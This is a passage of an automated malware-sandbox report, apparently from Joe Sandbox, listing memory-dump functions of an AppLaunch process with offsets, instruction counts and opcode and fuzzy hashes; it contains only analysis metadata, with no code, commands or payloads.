                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04910439 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5bc79f3d9d6f3d6cd9d9bb22c6d161c1b22829a2cb6609e6ba11196df48b7bc4
                                                                                                                                                                    • Instruction ID: 6ac7da4a6e1984e6a230330a16f2cf1fe51305c549581d14209469dbf462a685
                                                                                                                                                                    • Opcode Fuzzy Hash: 5bc79f3d9d6f3d6cd9d9bb22c6d161c1b22829a2cb6609e6ba11196df48b7bc4
                                                                                                                                                                    • Instruction Fuzzy Hash: 44D05E7181620C9FC311AFB4B54A7AA7F78E703309F0462A5D5089F2D2FB2699429265
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04910480 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2dfe6ee0fe8074aeb6dc5513463324c4469fd8f824f88e4f1fb6b97efa0d9ca2
                                                                                                                                                                    • Instruction ID: f71c8d54b64950c092accde8fd53f58b600f45e8a5d256fef22b92d8acaef7aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 2dfe6ee0fe8074aeb6dc5513463324c4469fd8f824f88e4f1fb6b97efa0d9ca2
                                                                                                                                                                    • Instruction Fuzzy Hash: 08E04631901208EBDB00EFFAE50865D7BE8EB85348F1099A99806AB250FB356E449B91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049166A0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 800970a70c64461bb815522047d4cfc8d260fcd54380961e6e3af40d57054704
                                                                                                                                                                    • Instruction ID: 2a66dbebf0f83834fcf2a2f6834c80f549d68569ca5faa7e84f156805bfebf11
                                                                                                                                                                    • Opcode Fuzzy Hash: 800970a70c64461bb815522047d4cfc8d260fcd54380961e6e3af40d57054704
                                                                                                                                                                    • Instruction Fuzzy Hash: A9E0263010C3505BFF01DA24A864C583B90EB81304B01484CED418F28AD6A81D0093D3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049131C0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2e295b2381469cfffa4255c82acd11127b7821def7ee2edc3fcf5684110e6176
                                                                                                                                                                    • Instruction ID: 749fc8c3f2eabaff87821efc1faad8dc7a8968805c6f777ee274a657669dbfe0
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e295b2381469cfffa4255c82acd11127b7821def7ee2edc3fcf5684110e6176
                                                                                                                                                                    • Instruction Fuzzy Hash: 3ED0C7313000208B860623EDB1088AE3BAADAD5222300002EE20B83A02DE292C0247FA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04917D8D Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d4e3a97394e3894a8de01d87e22ecbf2dbf06b0f71a592fc787430ea1630aec2
                                                                                                                                                                    • Instruction ID: 5fe45f2f2c3f67d6debdc606f409e3d3b008746772a3bcde5437005a75722e0a
                                                                                                                                                                    • Opcode Fuzzy Hash: d4e3a97394e3894a8de01d87e22ecbf2dbf06b0f71a592fc787430ea1630aec2
                                                                                                                                                                    • Instruction Fuzzy Hash: D1E012767001145F97059BDDF84446DB7B5F7C9267340043EFA0AD3741EB351C018BA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491DF98 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 647b88799bcb199650161b5dfbdad6d6b49b2d7d2b32da74991fa123d22f7077
                                                                                                                                                                    • Instruction ID: d5045137e6d5f82d1975140749afa99f717e94ed2e59ba77b93b11e482918177
                                                                                                                                                                    • Opcode Fuzzy Hash: 647b88799bcb199650161b5dfbdad6d6b49b2d7d2b32da74991fa123d22f7077
                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092B4D0420D9F8B84EFA9D4415BEBFF8AB48201F10856AD918E2240E6345A51CFD1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491BE90 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: ef4bca03284927627baf60599ef880aab53a5bb79bab3e86d20e46d94e6ac254
                                                                                                                                                                    • Instruction ID: 4d50c8991513b10377575c142b1ddeb5067b4ac0558a0ced4b9fbe96d7c230f7
                                                                                                                                                                    • Opcode Fuzzy Hash: ef4bca03284927627baf60599ef880aab53a5bb79bab3e86d20e46d94e6ac254
                                                                                                                                                                    • Instruction Fuzzy Hash: 36E026385083849BCB44DF78D0063413B92EFC020CF14C0ADC40A4F64BCB3BA5809BC6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491B270 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 08da3881237d1a046c94d7e050c65c01c791f791f540b079e497568db83b76fb
                                                                                                                                                                    • Instruction ID: 50536b55e68161ee40d1d0f45c4f36071af9fccba9259b971279a7f98434476a
                                                                                                                                                                    • Opcode Fuzzy Hash: 08da3881237d1a046c94d7e050c65c01c791f791f540b079e497568db83b76fb
                                                                                                                                                                    • Instruction Fuzzy Hash: 7BD02233604328AB4704EAA994105CEBFDDCAC42B0B0000AAC80CD7240EC702A0043EC
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04916D18 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 239a102cfd6802fb180fa4db1e6ccbdf19a022bab4e4c1068672daed5e107bb2
                                                                                                                                                                    • Instruction ID: 5761167d691853cdaf38153f9a450852e4f50a210845c54eeff757632d5d69f9
                                                                                                                                                                    • Opcode Fuzzy Hash: 239a102cfd6802fb180fa4db1e6ccbdf19a022bab4e4c1068672daed5e107bb2
                                                                                                                                                                    • Instruction Fuzzy Hash: C4D017362485849FCB42DB64C454C897F32BF2A25035440D9E585CF232C3728810DF00
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049178D8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 74b0fc54b6b5262ee404685bae76012af020c20c3ea48e39c2238fe74974b6d5
                                                                                                                                                                    • Instruction ID: 30a14eaf5b0b9b18614d206b2fd167e5b2c74000101404299f303aa23fc72d3a
                                                                                                                                                                    • Opcode Fuzzy Hash: 74b0fc54b6b5262ee404685bae76012af020c20c3ea48e39c2238fe74974b6d5
                                                                                                                                                                    • Instruction Fuzzy Hash: 17D0A92030C1E20F870323BC3630068BFA1DFC208638A50EEE6C1CB3D7C914088B83A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04910448 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9491f487c991633b4766c16b79b60fd6c07212b48029902cb569d9e5c662044b
                                                                                                                                                                    • Instruction ID: 5a4d3aad4fe2295a6d7f06c8dac3799d7cd84327ca93918c9ad44007e47bbf2a
                                                                                                                                                                    • Opcode Fuzzy Hash: 9491f487c991633b4766c16b79b60fd6c07212b48029902cb569d9e5c662044b
                                                                                                                                                                    • Instruction Fuzzy Hash: D5C012308112089FC710AAA9B40C7697AACE703705F40269494085A181EB7658408565
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491B241 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: bf5c1da9b79f133fb14b01de21a767c2103090b8da262f1e47011f7557c8e1d2
                                                                                                                                                                    • Instruction ID: 28ef6b1774107007c1776dd3ecb4de43af7bf1f7e83f15a24600ccdf76eaf8e7
                                                                                                                                                                    • Opcode Fuzzy Hash: bf5c1da9b79f133fb14b01de21a767c2103090b8da262f1e47011f7557c8e1d2
                                                                                                                                                                    • Instruction Fuzzy Hash: D0B0922008A7810FCF2356A05C580883F30980321230502CAC082CBA17810A846F9766
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04917D29 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5087a9e20558564ed6a49474f6e22a785ac847b97dc02736563f5da1f2906def
                                                                                                                                                                    • Instruction ID: e80d02c4cca0fd28e2b63cddc253ec7b5374d8173d7e1242b50a91e18d233b50
                                                                                                                                                                    • Opcode Fuzzy Hash: 5087a9e20558564ed6a49474f6e22a785ac847b97dc02736563f5da1f2906def
                                                                                                                                                                    • Instruction Fuzzy Hash: 19B0122241D478139702B2D8BA405C8FB2085500AA2E80596D54C9EBA2960580215BF8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 09BA5538 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.386999394.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_9ba0000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: .$1
                                                                                                                                                                    • API String ID: 0-1839485796
                                                                                                                                                                    • Opcode ID: a1e8d3968d8bc428bb0143ccf84f611f200e71cf4df45c795fa67de8fb708f0b
                                                                                                                                                                    • Instruction ID: 02dd6556946a9e7fe14eae810faf75f6b2cdfa3847ac75963d2396d44f6b1cca
                                                                                                                                                                    • Opcode Fuzzy Hash: a1e8d3968d8bc428bb0143ccf84f611f200e71cf4df45c795fa67de8fb708f0b
                                                                                                                                                                    • Instruction Fuzzy Hash: 44F1CF74E01228CFDB28DF65C894B9DBBB2FF89301F5081A9E409AB250DB715E86CF51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 09BA2018 Relevance: .5, Instructions: 496COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.386999394.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_9ba0000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4e5cb0f87761c81e57424fd89cb7ac3b3677d8a948d58e0a4cc61b35c39b31c2
                                                                                                                                                                    • Instruction ID: 5649319c5fb79ec1f5030b96a841ae7fc64a5905bed95b7925d4b5ec2590036d
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e5cb0f87761c81e57424fd89cb7ac3b3677d8a948d58e0a4cc61b35c39b31c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 1532AE70D05229CFDB28DF65C890B9EBBB2BB89300F1091E9D51AAB354DB349E81CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 09BA1414 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.386999394.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_9ba0000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7b3c52e5e3e07621a83960a564266097804cdfe351af0e86f99a3b0abf4da27f
                                                                                                                                                                    • Instruction ID: 9bf01cdeb7042b12a137c54f292f24dfd423453fd5d03040c642aadf8d01b813
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b3c52e5e3e07621a83960a564266097804cdfe351af0e86f99a3b0abf4da27f
                                                                                                                                                                    • Instruction Fuzzy Hash: F8F0C970C4D219CBDB609F58D8597BDBAB4EB0736AF105499D00677160CB784A85CF84
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%